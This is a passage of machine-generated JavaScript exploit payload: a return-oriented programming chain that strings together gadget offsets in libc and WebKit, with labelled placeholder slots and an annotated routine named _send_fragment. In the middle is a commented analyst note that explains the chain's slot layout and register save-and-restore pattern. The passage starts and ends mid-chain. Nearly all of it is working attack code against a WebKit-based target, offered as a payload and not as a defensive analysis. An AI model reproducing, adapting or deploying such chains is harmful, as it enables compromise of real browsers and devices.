rax, cl libc_base+764760, //pop rsi ropchain+579744, //L12852 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+144605 //pop rdi ]); //L12852: db([0, 0]); // 0x0 set_gadgets([ libc_base+478984, //sar edi, cl libc_base+764760, //pop rsi ropchain+579872, //L12854 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+579888, //L12855 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+579856, //L12853 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L12853: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L12854: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L12855: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+580048, //L12859 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+580016, //L12857 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+580032, //L12858 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L12856: db([48, 0]); // 0x30 set_gadget(webkit_base+3236123,); //pop r9 //L12857: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L12858: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L12859: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+580152, //L12861 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+580136, //L12860 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L12860: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L12861: db([0, 0]); // 0x0 
set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608 //pop rax ]); //L12862: db([8, 0]); // 0x8 set_gadget(libc_base+763368,); //pop rcx //L12863: db([8, 0]); // 0x8 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+580360, //L12866 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+580344, //L12865 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L12864: db([48, 0]); // 0x30 set_gadget(webkit_base+3236123,); //pop r9 //L12865: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L12866: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+580464, //L12868 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+580448, //L12867 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L12867: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L12868: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+580544, //L12869 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L12869: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L12871: db([16, 0]); // 0x10 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+580664, //L12874 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi 
libc_base+764760, //pop rsi ropchain+580648, //L12872 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L12872: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L12874: db([0, 0]); // 0x0 set_gadgets([ libc_base+224144, //mov ax, [rdi] libc_base+764760, //pop rsi ropchain+580824, //L12878 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+580792, //L12876 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+580808, //L12877 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L12875: db([16, 0]); // 0x10 set_gadget(webkit_base+3236123,); //pop r9 //L12876: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L12877: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L12878: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+580880, //L12880 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+144605 //pop rdi ]); //L12880: db([0, 0]); // 0x0 set_gadgets([ libc_base+478984, //sar edi, cl libc_base+764760, //pop rsi ropchain+581008, //L12882 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+581024, //L12883 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+580992, //L12881 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L12881: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L12882: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L12883: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+581184, //L12887 webkit_base+660161, //mov [rsi], rax ; mov al, 1 
libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+581152, //L12885 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+581168, //L12886 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L12884: db([48, 0]); // 0x30 set_gadget(webkit_base+3236123,); //pop r9 //L12885: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L12886: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L12887: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+581288, //L12889 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+581272, //L12888 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L12888: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L12889: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608 //pop rax ]); //L12890: db([8, 0]); // 0x8 set_gadget(libc_base+763368,); //pop rcx //L12891: db([8, 0]); // 0x8 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+581488, //L12894 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+581472, //L12893 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L12892: db([32, 0]); // 0x20 set_gadget(webkit_base+3236123,); //pop r9 //L12893: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L12894: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+848080, //shr rax, cl 
libc_base+764760, //pop rsi ropchain+581592, //L12896 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+581576, //L12895 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L12895: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L12896: db([0, 0]); // 0x0 set_gadgets([ libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+581704, //L12899 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+581688, //L12898 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L12897: db([48, 0]); // 0x30 set_gadget(webkit_base+3236123,); //pop r9 //L12898: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L12899: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+581768, //L12901 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+763368 //pop rcx ]); //L12901: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+581824, //L12902 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L12902: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi webkit_base+105700, //or rax, rcx libc_base+764760, //pop rsi ropchain+581976, //L12905 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+581992, //L12906 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+581960, //L12904 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L12904: db([0, 0]); // 0x0 
// Analyst note: this run is part of the machine-generated chain that follows the
// `___bswap16_var` label; the next named label, `_send_fragment`, comes later.
// The listing's original line breaks were lost, so each `//mnemonic` or `//Lnnnnn`
// annotation belongs to the operand or slot written immediately before it.
// Layout: set_gadget() emits one 8-byte entry (two Uint32 words) and db([lo, hi])
// emits a 64-bit immediate the same way. Every `ropchain+N` operand is a byte
// offset to one of the `//Lnnnnn:` db([0, 0]) placeholder slots.
// Pattern, going by the inline annotations: `pop rsi ; <slot address> ; mov [rsi], rax`
// writes the current rax into a placeholder that sits right after a `pop <reg>`
// entry, so the value is loaded into that register when the chain reaches it.
// Registers are saved and restored this way around each operation.
// The `shl rax, cl ; shr rax, cl` pair runs after rcx is popped from the 0x30 slot
// (L12907). That presumably keeps only the low 16 bits of rax; confirm against the
// gadget bytes.
// NOTE(review): rdi looks like the chain's data-stack pointer (`sub rdi, rsi` with
// rsi = -0x8, then `mov rax, [rdi]`). This is inferred from the annotations only.
// The slot offsets (582120, 582136, 582152, ...) assume the exact number and order of
// entries emitted before them. Adding, removing or reordering an entry invalidates
// every later `ropchain+N` reference.
set_gadget(libc_base+144605,); //pop rdi //L12905: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L12906: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+582152, //L12910 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+582120, //L12908 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+582136, //L12909 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L12907: db([48, 0]); // 0x30 set_gadget(webkit_base+3236123,); //pop r9 //L12908: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L12909: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L12910: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+582272, //L12911 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+582304, //L12913 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+764760, //pop rsi ropchain+582288, //L12912 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L12911: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L12912: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L12913: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+582408, //L12914 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+582424, //L12915 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+568675 //pop r8 ]); //L12914: db([0, 0]); // 0x0 
set_gadget(libc_base+759608,); //pop rax //L12915: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+582544, //L12916 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+582528, //L12917 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+759608 //pop rax ]); //L12917: db([0, 0]); // 0x0 set_gadget(libc_base+782311,); //pop rsp //L12916: db([0, 0]); // 0x0 set_gadgets([ libc_base+764760, //pop rsi ropchain+582632, //L12919 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+764760, //pop rsi ropchain+582616, //L12918 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L12918: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L12919: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+582736, //L12920 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+582752, //L12921 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+568675 //pop r8 ]); //L12920: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L12921: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+582872, //L12922 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+582856, //L12923 webkit_base+660161, //mov [rsi], rax ; mov al, 1 
libc_base+759608 //pop rax ]); //L12923: db([0, 0]); // 0x0 set_gadget(libc_base+782311,); //pop rsp //L12922: db([0, 0]); // 0x0 //_send_fragment: set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+582944, //L12925 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 webkit_base+568675 //pop r8 ]); //L12925: db([0, 0]); // 0x0 set_gadgets([ libc_base+426295, //mov [rdi], rax libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+583008, //L12927 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 webkit_base+568675 //pop r8 ]); //L12927: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8240, 0]); // 0x2030 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+583080, //L12928 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L12928: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L12929: db([44, 0]); // 0x2c set_gadget(libc_base+144605,); //pop rdi //L12930: db([44, 0]); // 0x2c set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+583272, //L12934 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+583240, //L12932 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+583256, //L12933 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L12931: db([56, 0]); // 0x38 set_gadget(webkit_base+3236123,); //pop r9 //L12932: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L12933: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L12934: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+848080, //shr rax, cl 
libc_base+764760, //pop rsi ropchain+583376, //L12936 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+583360, //L12935 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L12935: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L12936: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+731401, //mov rax, r8 libc_base+764760, //pop rsi ropchain+583472, //L12938 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+764760 //pop rsi ]); //L12937: db([4294959104, 4294967295]); // -0x2000 set_gadget(libc_base+759608,); //pop rax //L12938: db([0, 0]); // 0x0 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760 //pop rsi ]); db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+583552, //L12940 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L12940: db([0, 0]); // 0x0 set_gadgets([ libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+583608, //L12941 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L12941: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608 //pop rax ]); //L12943: db([0, 0]); // 0x0 set_gadget(libc_base+763368,); //pop rcx //L12944: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+755660, //add rax, rcx libc_base+764760, //pop rsi ropchain+583760, //L12946 webkit_base+660161, //mov 
[rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L12946: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+583816, //L12947 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L12947: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+583888, //L12950 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L12950: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+583944, //L12951 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L12951: db([0, 0]); // 0x0 set_gadgets([ webkit_base+1121481, //mov [rax], cl libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+584032, //L12953 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L12953: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L12954: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L12955: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+584224, //L12959 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+584192, //L12957 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+584208, //L12958 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L12956: db([56, 0]); // 0x38 
set_gadget(webkit_base+3236123,); //pop r9 //L12957: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L12958: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L12959: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+584328, //L12961 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+584312, //L12960 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L12960: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L12961: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+731401, //mov rax, r8 libc_base+764760, //pop rsi ropchain+584424, //L12963 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+764760 //pop rsi ]); //L12962: db([4294959104, 4294967295]); // -0x2000 set_gadget(libc_base+759608,); //pop rax //L12963: db([0, 0]); // 0x0 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760 //pop rsi ]); db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+584504, //L12965 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L12965: db([0, 0]); // 0x0 set_gadgets([ libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+584560, //L12966 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L12966: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608 //pop rax ]); //L12968: db([1, 0]); // 0x1 set_gadget(libc_base+763368,); //pop rcx //L12969: db([1, 0]); // 0x1 
set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+755660, //add rax, rcx libc_base+764760, //pop rsi ropchain+584712, //L12971 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L12971: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+584768, //L12972 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L12972: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+584840, //L12975 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L12975: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+584896, //L12976 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L12976: db([0, 0]); // 0x0 set_gadgets([ webkit_base+1121481, //mov [rax], cl libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+584984, //L12978 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L12978: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L12979: db([1, 0]); // 0x1 set_gadget(libc_base+144605,); //pop rdi //L12980: db([1, 0]); // 0x1 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+585176, //L12984 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, 
//pop rsi ropchain+585144, //L12982 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+585160, //L12983 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L12981: db([56, 0]); // 0x38 set_gadget(webkit_base+3236123,); //pop r9 //L12982: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L12983: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L12984: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+585280, //L12986 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+585264, //L12985 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L12985: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L12986: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+731401, //mov rax, r8 libc_base+764760, //pop rsi ropchain+585376, //L12988 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+764760 //pop rsi ]); //L12987: db([4294959104, 4294967295]); // -0x2000 set_gadget(libc_base+759608,); //pop rax //L12988: db([0, 0]); // 0x0 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760 //pop rsi ]); db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+585456, //L12990 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L12990: db([0, 0]); // 0x0 set_gadgets([ libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+585512, //L12991 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L12991: db([0, 0]); // 0x0 
